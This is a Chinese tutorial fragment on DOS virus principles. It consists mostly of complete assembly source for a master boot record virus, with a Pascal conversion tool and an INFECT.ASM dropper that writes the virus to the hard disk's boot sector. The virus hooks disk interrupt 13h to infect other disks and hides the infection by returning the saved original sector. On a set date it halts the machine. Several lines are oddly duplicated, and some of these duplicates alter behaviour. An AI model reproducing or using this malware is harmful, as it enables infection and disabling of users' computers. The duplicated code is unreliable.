Dos病毒原理
4。驻留的位置
位置在40H:13H,单位为KB。病毒体存在于最后的几K内存中。
一个主引导记录病毒例子
int13 macro
pushf
Call dword Ptr cs:Old13H
endm
jmp13 macro
Jmp dword Ptr cs:Old13h
endm
.286
code segment
assume cs:code,ds:code
Org 100h
start:
org 7c00h
;start:
jmp short begin
db 20h dup (0)
db 'WN'
begin:
xor ax,ax
xor ax,ax
Mov es,ax
Push Word Ptr es:[13h*4]
Pop Word Ptr cs:Old13h
Push Word Ptr es:[13h*4+2]
Pop Word Ptr cs:Old13h+2
mov ah,04h
int 1ah
cmp dl,5
jne datenot1
cmp dh,12h
jne datenot1
call printmsg
datenot1:
push cs
pop ds
mov ax,40h
mov es,ax
dec word ptr es:[13h] ;减少基本内存1K
mov ax,es:[13h]
mov cl,6 ;2&10 /2&4
shl ax,cl ;得到段址
mov es,ax
mov es,ax
mov cx,200h ;512 bytes a sector
mov si,7c00h ;The begin offet
mov di,0
cld
rep movsb
Mov ax,es
Sub ax,7c0H
Push ax
Mov ax,Offset TheNextCommand
Push ax
mov ax,es
sub ax,7c0h ;The segment of the president
mov es,ax
mov bx,0
mov ds,bx
mov word ptr ds:[13h*4],offset newint13h
mov word ptr ds:[13h*4+2],ax
RetF
Old13h dd ?
TheNextCommand:
mov ax,0201h
mov cx,2
mov cx,2
Cmp cs:TheDrive,80h
Je Hardisk
mov cx,4f0fh ;If is the floppy disk
Hardisk:
mov dh,0
Mov dl,cs:TheDrive ;The drive is 0 or 80h
Mov bx,0
Mov es,bx
Mov bx,7c00H
int13
Mov ax,0
Push ax
Mov ax,7c00h
Push ax
RetF
newint13h:
cmp ax,0201h
je Isreadsector
Jmp13
IsReadSector:
cmp cx,1
jne notreadsector
cmp dh,0
jne notreadsector
Call Readsector
Jne gotoEnd
;Cmp dl,cs:TheDrive
;Jne NotReadSector ;If the DISK is the boot disk
push cx
mov cx,2
Cmp dl,80h
Jae HardRead
mov cx,4f0fh
HardRead:
int13 ;制造未感染假象
pop cx
RetF 2
notreadsector:
call readsector
je effected
call effect
effected:
gotoEnd:
jmp13
jmp13
readsector:
pusha
mov ax,0201h
mov dh,0
mov cx,1
int13 ;Use the read buffer as the old buffer
cmp word ptr es:[bx+20h+2],'NW'
popa
retn
effect:
pusha
mov ax,0301h
mov dh,0
mov cx,2
Cmp dl,80h
Jae Hardeffect
mov cx,4f0fh
Hardeffect:
int13 ;Backup the old boot record
Mov SI,BX
Add SI,1b0h
Push ES
Push ES
Pop DS
Push cs
Pop ES
Mov DI,7C00H+1b0H
Mov Cx,50h
CLD
REP MovSB
Mov SI,BX
add SI,2
Mov DI,7c00H+2
Mov Cx,20h
Cld
Rep movsb
mov ax,0301h
mov cx,1
mov dh,0
push cs
pop es
Push ax
Mov al,cs:TheDrive
Mov cs:TheDriveSave,Al ;Backup theDrive
Pop ax
Pop ax
Mov cs:TheDrive,DL
And cs:TheDrive,0FEH ;Set the 0 bit to zero
mov bx,7c00h
int13 ;Write The Virus to sector 1
Mov al,cs:TheDriveSave
Mov cs:TheDrive,al ;Restore TheDrive
popa
retn
printmsg Proc Near
mov si,offset msg
push cs
pop ds
mov ah,0eh
cld
printgoon:
lodsb
cmp al,0
je printend
int 10h
jmp printgoon
printend:
jmp $
jmp $
msg db 'Don''t work today.',0
TheDrive db 80h
TheDriveSave db ?
org 7dfeh
db 55h,0aah
PrintMsg endp
code ends
end start
{这个程序用来处理以上病毒程序,使其成为一个256字节的从7C00H开始的二进制文件}
Program C2V;
Var
F,F1:File of char;
CH:Char;
Begin
assign(F,paramstr(1));
Reset(F);
Assign(F1,Paramstr(2));
Rewrite(F1);
seek(F,$7B00);
While Not Eof(F) do
Begin
Read(F,CH);
Read(F,CH);
Write(F1,CH);
end;
Close(F);
Close(F1);
End.
.title INFECT.ASM
Comment~
本程序是用来 原始感染
~
Code segment
assume cs:code,ds:code
org 100h
start:
mov ax,0201h
Mov Bx,Offset TheBuf
mov cx,1
Mov dx,80H
Int 13h
Mov ax,0301h
Mov CX,2
Int 13h
Mov ax,3d00h
Mov ax,3d00h
Mov Dx,Offset FileName
Int 21h
Jnc @@1
mov dx,offset OpenError
mov ah,9
int 21h
mov ah,4ch
int 21h
@@1:
Mov Handle,ax
Mov Bx,ax
Mov ah,3fh
mov cx,512
mov dx,Offset fileBuf
Int 21h
Mov Di,Offset FileBuf+2
Mov SI,Offset TheBuf+2
Cld
Mov Cx,20h
Rep Movsb
Mov Di,Offset FileBuf+1b0h
Mov Si,Offset TheBuf+1b0h
Mov cx,50h
Cld
Rep movsb
Mov Bx,Offset FileBuf
Mov Cx,1
Mov dx,80h
Mov ax,0301h
int 13h
Mov Bx,Handle
Mov ah,3eh
Int 21h
mov ah,4ch
int 21h
TheBuf db 512 dup (0)
FILEBuf db 512 dup (0)
Handle dw 0
OpenError db 'The file Viru.bin not found!',07h,0dh,0ah,'$'
filename db 'Viru.bin',0
code ends
end start
|
|